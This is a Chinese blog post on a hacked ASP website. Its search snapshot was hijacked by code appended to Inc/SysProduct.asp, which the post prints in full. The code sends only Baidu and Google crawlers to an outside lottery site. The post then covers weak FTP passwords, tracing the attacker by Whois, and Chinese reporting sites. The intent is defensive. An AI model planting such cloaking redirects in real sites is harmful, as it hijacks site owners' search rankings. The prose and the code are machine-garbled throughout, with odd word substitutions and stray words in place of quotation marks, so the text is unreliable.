前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家彩票平台的网站内容。
我知道网站被黑客加入了造孽代码,恶意修改了百度快照。
(截图如下)

查看“百度快照”涌现的是一组跳转网站的广告内容。
我们对客户设置的网站信息消逝了。

1、黑客是如何修正百度快照的呢?

jsp万网乱码百度快照是若何被黑客改动的 AJAX

我进行了排查,客户的网站是利用asp源码开拓的。
创造有个文件被黑客写入了一段代码。

路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:

<%

function Getbot()

dim s_agent

GetBot=\公众\"大众

s_agent=Request.ServerVariables(\"大众HTTP_USER_AGENT\公众)

if instr(1,s_agent,\"大众googlebot\"大众,1) > 0 then

GetBot=\公众google\"大众

end if

if instr(1,s_agent,\公众baiduspider\公众,1) > 0 then

GetBot=\"大众baidu\"大众

end if

end function

if GetBot=\公众baidu\"大众 or GetBot=\"大众google\"大众 then

'

Response.Redirect \"大众http://\"大众(跳转的网站,勾引百度抓取的内容)

else

'

Response.Write\"大众\"大众

end if

%>

黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取超越客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。
使得客户本来排名首页的网站直接被百度屏蔽了。
造成了客户很大的丢失。

2、那么黑客是如何进入后台的呢?

黑客要进入后台,必须知道FTP账户和密码,以及IP地址。

造成的缘故原由有如下几种:

1)一方面是FTP密码设置的时候比较大略化,很随意马虎被利用软件破解掉,

2)另一方面选择便宜的空间也是一种隐患。
由于空间IP以及用户名是很难被知道的,除非有人供应。

3、网站被黑之后,你如何追查黑客的来源?

方法比较大略,便是查询你跳转的目标网站的域名信息。
一样平常情形下,都是一些小型的站长开拓的赢利网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能便是黑你网站的人。

如果是比较大型的网站利用外包的办法进行推广,那么你也可以得知卖力人,给百度或者是网络警察举报一下,该网站存在恶意攻击修正内容的行为,毕竟它也有一定得任务。

通过中国万网Whois域名查询:比如我客户跳转的彩票网站的域名信息如下:

1)第一个是:注册人

2)第二个是:联系电话

3)第三个是:联系邮箱

基本上你联系注册人就可以办理问题。
如果对你客户造成的丢失太大的话,建议你通过以下办法进行维权:

违法和不良信息举报中央:http://net.china.cn/

12321网络不良与垃圾信息举报受理中央:http://www.12321.cn/

国家互联网应急中央网络安全举报中央:http://www.cert.org.cn/

中国反钓鱼网站同盟认定及处理流程: http://www.cnnic.cn/

公安部信息网络安全报警网站:http://www.cyberpolice.cn/wfjb/

中国扫黄打非网:http://www.shdf.gov.cn/

北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp

希望本篇文章对你防黑有帮助。

来源:卢松松博客(微信/QQ号:13340454),欢迎分享本文,转载请保留出处!